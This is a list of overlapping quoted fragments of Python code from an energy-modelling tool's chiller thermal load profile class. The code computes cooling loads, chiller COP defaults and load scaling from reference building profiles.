"scalar makes it such that # when the percent shares are later applied",
"max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a",
"max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is",
"for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case",
"it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list",
"load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction')",
"in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for",
"is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate",
"(float or int) maximum thermal factor on peak load for the Chiller :param",
"Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for",
"\"\"\" Chiller Load Profiles based on CRB defined load shapes or user-defined input",
"int) maximum thermal factor on peak load for the Chiller :param kwargs: (dict)",
"electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction')",
"is None: if electric_load_list is not None: #This is a static method so",
"if there is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or",
"partial load if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] =",
"longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation",
"for i in kwargs['loads_ton']] # DOE Reference building profile are used if there",
"if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht",
"None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for",
"site latitude :param longitude: (float) site longitude :param nearest_city: (str) site nearest_city :param",
"0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is",
"provided, scale by a fraction of electric load elif kwargs.get('loads_fraction') is not None:",
"we want to act as if we had scaled the partial load to",
"datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)]",
"such that # when the percent shares are later applied that the total",
"loads can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\")",
"hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale by a fraction of",
"= year # Default electric_load_list to None, used later to see if we",
"if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l",
"Profiles based on CRB defined load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path,",
"= time_steps_per_hour self.year = year # Default electric_load_list to None, used later to",
"max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0:",
"self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year #",
"doe_reference_name or loads_ton provided, scale by a fraction of electric load elif kwargs.get('loads_fraction')",
"builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod",
"no doe_reference_name or loads_ton provided, scale by a fraction of electric load elif",
"max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which this load object will",
"max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def",
"self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x",
"we had scaled the partial load to the total site # load which",
"load to each partial load if (len(doe_reference_name) > 1): for i, load in",
"if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) *",
"of the default annual loads for this location if (len(doe_reference_name) > 1) and",
"each partial load if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i]",
"year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which this load",
"kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] *",
"latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default electric_load_list",
"self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies a list of",
"(if not user-entered) self.chiller_cop = chiller_cop # Update COP based on estimated max",
"shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads =",
"= json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\":",
"kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list",
"in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist",
"if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always",
"used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] =",
"\\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None: electric_load_list =",
"dfm: (object) data_manager to which this load object will be added :param total_electric_load_list:",
"parsed inputs :param latitude: (float) site latitude :param longitude: (float) site longitude :param",
"This scalar makes it such that # when the percent shares are later",
"(dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude",
"specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude",
"is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1]",
"to act as if we had scaled the partial load to the total",
"kwargs['annual_energy'] = None # Annual loads are used in place of percent shares",
"periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif",
"user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix",
"kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name']",
"# Aggregate total hybrid load hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not",
"or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return",
"import json import pandas as pd import numpy as np from datetime import",
"i in range(len(doe_reference_name)): # Monthly loads can only be used to scale a",
"= time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list =",
"i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i]",
"a fraction of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction'])",
"len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are used in",
"= nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour >",
"a list of doe_reference_names and percent shares # for consistency we want to",
"not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons",
"kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] *",
"in units of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for",
"None: if electric_load_list is not None: #This is a static method so it",
"for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load =",
"can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is",
"kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE",
"i in kwargs['loads_ton']] # DOE Reference building profile are used if there is",
"combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads can only be",
"as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\"",
"if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in",
"to the total site # load which was unknown at the start of",
"the total site # load which was unknown at the start of the",
":param year: (int) electric LoadProfile year :param chiller_cop: (float or int) Coefficient of",
"provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i",
"kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix",
"shares are later applied that the total site load will be the sum",
"sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent",
"load shapes or user-defined input \"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads",
"in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton provided,",
"i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton",
"* kwargs['monthly_fraction'][month-1] \\ for i, month in enumerate(month_series.month)] elif kwargs.get('annual_fraction') is not None:",
"year super(LoadProfileChillerThermal, self).__init__(**kwargs) if time_steps_per_hour > 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\",
"scale by a fraction of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list",
"# for consistency we want to act as if we had scaled the",
"highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for",
"COP based on kwth load or kw load (if not user-entered) self.chiller_cop =",
"is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise",
"defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude",
"for i in range(len(doe_reference_name)): # Monthly loads can only be used to scale",
"enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar)",
"max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw",
"in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0",
"to which this load object will be added :param total_electric_load_list: (array) electric LoadProfile",
"# DOE Reference building profile are used if there is a reference name",
"makes it such that # when the percent shares are later applied that",
"= max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw /",
"it such that # when the percent shares are later applied that the",
"on peak load for the Chiller :param kwargs: (dict) Chiller specific inputs as",
"Chiller specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city = nearest_city self.latitude =",
"for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load",
"/ TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT *",
"based on kwth load or kw load (if not user-entered) self.chiller_cop = chiller_cop",
"is a reference name provided elif kwargs.get('doe_reference_name'): doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist",
"pandas as pd import numpy as np from datetime import datetime from reo.utilities",
"not None: self.load_list = [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if",
"None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based",
"= [i*self.chiller_cop for i in electric_load_list] self.annual_kwht = int(round(sum(self.load_list),0)) if dfm is not",
"[i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name",
":param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs \"\"\" self.nearest_city =",
"longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year",
"hybrid_loadlist] else: electric_load_list = hybrid_loadlist # If no doe_reference_name or loads_ton provided, scale",
"the partial load to the total site # load which was unknown at",
"(len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in",
"provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy'] = kwargs[\"annual_tonhour\"] kwargs['annual_loads'] = self.annual_loads kwargs['builtin_profile_prefix']",
"of the loop above. This scalar makes it such that # when the",
"datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles",
"kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix kwargs['latitude'] = latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city']",
"kWht electric_load_list = None # Use highest resultion/quality input first if kwargs.get('loads_ton') is",
"not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list is always expected to be",
"load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] =",
"/ TONHOUR_TO_KWHT * \\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or",
"month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i,",
"kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly loads",
"\"\"\" with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\"",
"covert kWh to kWht electric_load_list = None # Use highest resultion/quality input first",
"elif kwargs.get('monthly_fraction') is not None: month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i]",
"* kw for kw in total_electric_load_list] #Calculate COP based on kwth load or",
"unknown at the start of the loop above. This scalar makes it such",
"is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None:",
"nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object) data_manager to which",
"= latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year = year # Default",
"inputs :param latitude: (float) site latitude :param longitude: (float) site longitude :param nearest_city:",
"= list(np.array(load)* scalar) #Apply the percent share of annual load to each partial",
"by a fraction of electric load elif kwargs.get('loads_fraction') is not None: electric_load_list =",
"case where the user supplies a list of doe_reference_names and percent shares #",
"nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int) electric LoadProfile year",
"elif kwargs.get('annual_fraction') is not None: electric_load_list = [kwargs['annual_fraction'] * kw for kw in",
"self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile are",
"scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share",
"= sum([sum(l) for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load =",
"load if (len(doe_reference_name) > 1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load)",
"kw load (if not user-entered) self.chiller_cop = chiller_cop # Update COP based on",
"# of the default annual loads for this location if (len(doe_reference_name) > 1)",
"combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 /",
"doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] = year super(LoadProfileChillerThermal, self).__init__(**kwargs) if",
"if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] #",
"# Annual loads are used in place of percent shares if provided if",
"the case where the user supplies a list of doe_reference_names and percent shares",
"can only be used to scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if",
"the start of the loop above. This scalar makes it such that #",
"list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not None): #load_list",
"= max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT elif",
"None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif kwargs.get('monthly_fraction') is not None: month_series =",
"max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT",
"resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list = [i*TONHOUR_TO_KWHT for i",
"{ \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None):",
"electric_load_list to None, used later to see if we need to covert kWh",
"load if self.chiller_cop is None: if electric_load_list is not None: #This is a",
"reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB defined",
"for l in combine_loadlist]) for i, load in enumerate(combine_loadlist): actual_percent_of_site_load = sum(load)/total_site_load scalar",
"which this load object will be added :param total_electric_load_list: (array) electric LoadProfile object",
"**kwargs): \"\"\" :param dfm: (object) data_manager to which this load object will be",
"if we had scaled the partial load to the total site # load",
"max_kwt / TONHOUR_TO_KWHT elif max_kw is not None: max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT",
"kwargs['annual_energy'] is None: total_site_load = sum([sum(l) for l in combine_loadlist]) for i, load",
"if self.chiller_cop is None: if electric_load_list is not None: #This is a static",
"= longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year'] =",
"__init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param",
"open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f: annual_loads = json.loads(f.read()) builtin_profile_prefix = \"Cooling8760_norm_\" electric_chiller_cop_defaults =",
"this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None: total_site_load = sum([sum(l)",
"= None kwargs['annual_energy'] = None # Annual loads are used in place of",
"Load Profiles based on CRB defined load shapes or user-defined input \"\"\" with",
"/ actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual load",
"i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid",
"\\ LoadProfileChillerThermal.electric_chiller_cop_defaults[\"convert_elec_to_thermal\"] else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons",
"maximum thermal factor on peak load for the Chiller :param kwargs: (dict) Chiller",
"pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour) electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \\ for i, month in",
"electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list] #Calculate COP based on",
"else: raise Exception(\"Please supply a max_ton, max_kwt or max_kw value\") estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons",
"in range(len(doe_reference_name)): # Monthly loads can only be used to scale a non-hybrid",
"load_list is always expected to be in units of kWth if electric_load_list is",
"not None: self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building",
"\"\"\" self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour",
"import BuiltInProfile import os import json import pandas as pd import numpy as",
"for kw in total_electric_load_list] #Calculate COP based on kwth load or kw load",
"* time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) #",
"the user supplies a list of doe_reference_names and percent shares # for consistency",
"# load which was unknown at the start of the loop above. This",
"hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0)) if (kwargs.get(\"annual_tonhour\") is not None) or (kwargs.get(\"monthly_tonhour\") is not",
"def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None: max_cooling_load_tons = max_ton",
"latitude kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour",
"of Performance for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on",
"estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load if estimated_max_chiller_thermal_capacity_tons < 100.0: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return",
"want to act as if we had scaled the partial load to the",
"> 1: partial_load_list = np.concatenate([[x] * time_steps_per_hour \\ for x in self.built_in_profile]) else:",
"scale a non-hybrid profile kwargs['monthly_totals_energy'] = kwargs.get(\"monthly_tonhour\") if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy']",
"kwargs['longitude'] = longitude kwargs['doe_reference_name'] = doe_reference_name[i] kwargs['nearest_city'] = nearest_city kwargs['time_steps_per_hour'] = time_steps_per_hour kwargs['year']",
"can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is",
"= 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of",
"load or kw load (if not user-entered) self.chiller_cop = chiller_cop # Update COP",
"will be the sum # of the default annual loads for this location",
"\"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None): if max_ton is not None:",
"(int) simulation time resolution :param year: (int) electric LoadProfile year :param chiller_cop: (float",
"the percent shares are later applied that the total site load will be",
"units of kWth if electric_load_list is not None: self.load_list = [i*self.chiller_cop for i",
"[i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile are used if",
"of annual load to each partial load if (len(doe_reference_name) > 1): for i,",
"units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist] else: electric_load_list =",
"time_steps_per_hour \\ for x in self.built_in_profile]) else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In",
"a static method so it can be accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop(",
"from reo.utilities import TONHOUR_TO_KWHT class LoadProfileChillerThermal(BuiltInProfile): \"\"\" Chiller Load Profiles based on CRB",
"LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method so it can be",
"object resulting from parsed inputs :param latitude: (float) site latitude :param longitude: (float)",
"1): for i, load in enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate",
"self.nearest_city = nearest_city self.latitude = latitude self.longitude = longitude self.time_steps_per_hour = time_steps_per_hour self.year",
"list(np.array(load)* scalar) #Apply the percent share of annual load to each partial load",
"expected to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in",
"used in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None:",
"for Chiller :param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load",
"else: #This is a static method so it can be accessible in views.py",
"actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the percent share of annual load to",
"json import pandas as pd import numpy as np from datetime import datetime",
"= [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']] # DOE Reference building profile are used",
"return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None,",
"In the case where the user supplies a list of doe_reference_names and percent",
"actual_percent_of_site_load = sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply",
"enumerate(combine_loadlist): combine_loadlist[i] = list(np.array(load) * (kwargs.get(\"percent_share\")[i]/100.0)) # Aggregate total hybrid load hybrid_loadlist =",
"accessible in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kwt=max(self.load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected",
"total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs): \"\"\" :param dfm: (object)",
"partial load to the total site # load which was unknown at the",
"annual loads for this location if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None:",
"in place of percent shares if provided if kwargs.get(\"annual_tonhour\") is not None: kwargs['annual_energy']",
"for the Chiller :param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs",
"if len(doe_reference_name)>1: kwargs['monthly_totals_energy'] = None kwargs['annual_energy'] = None # Annual loads are used",
"max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) # load_list is always expected to be in units of kWth if",
"nearest_city: (str) site nearest_city :param time_steps_per_hour: (int) simulation time resolution :param year: (int)",
"load for the Chiller :param kwargs: (dict) Chiller specific inputs as defined in",
"# Default electric_load_list to None, used later to see if we need to",
"when the percent shares are later applied that the total site load will",
"return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"less_than_100_tons\"] else: return LoadProfileChillerThermal.electric_chiller_cop_defaults[\"greater_than_100_tons\"] def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None, time_steps_per_hour=None,",
"import numpy as np from datetime import datetime from reo.utilities import TONHOUR_TO_KWHT class",
"chiller_cop # Update COP based on estimated max chiller load if self.chiller_cop is",
"= kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)): # Monthly",
"year :param chiller_cop: (float or int) Coefficient of Performance for Chiller :param max_thermal_factor_on_peak_load:",
"electric_chiller_cop_defaults = { \"convert_elec_to_thermal\": 4.55, \"less_than_100_tons\": 4.40, \"greater_than_100_tons\": 4.69} @staticmethod def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None,",
"None # Use highest resultion/quality input first if kwargs.get('loads_ton') is not None: self.load_list",
"else: partial_load_list = self.built_in_profile combine_loadlist.append(list(partial_load_list)) # In the case where the user supplies",
"electric load elif kwargs.get('loads_fraction') is not None: electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list)) elif",
"doe_reference_name = kwargs.get('doe_reference_name') or [] combine_loadlist = [] for i in range(len(doe_reference_name)): #",
"the total site load will be the sum # of the default annual",
"in views.py self.chiller_cop = LoadProfileChillerThermal.get_default_cop( max_kw=max(electric_load_list), max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load) else: #This is a static method",
"max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the Chiller",
"max_ton is not None: max_cooling_load_tons = max_ton elif max_kwt is not None: max_cooling_load_tons",
"at the start of the loop above. This scalar makes it such that",
"import os import json import pandas as pd import numpy as np from",
"= sum(load)/total_site_load scalar = 1.0 / actual_percent_of_site_load combine_loadlist[i] = list(np.array(load)* scalar) #Apply the",
"to be in units of kWt self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist]",
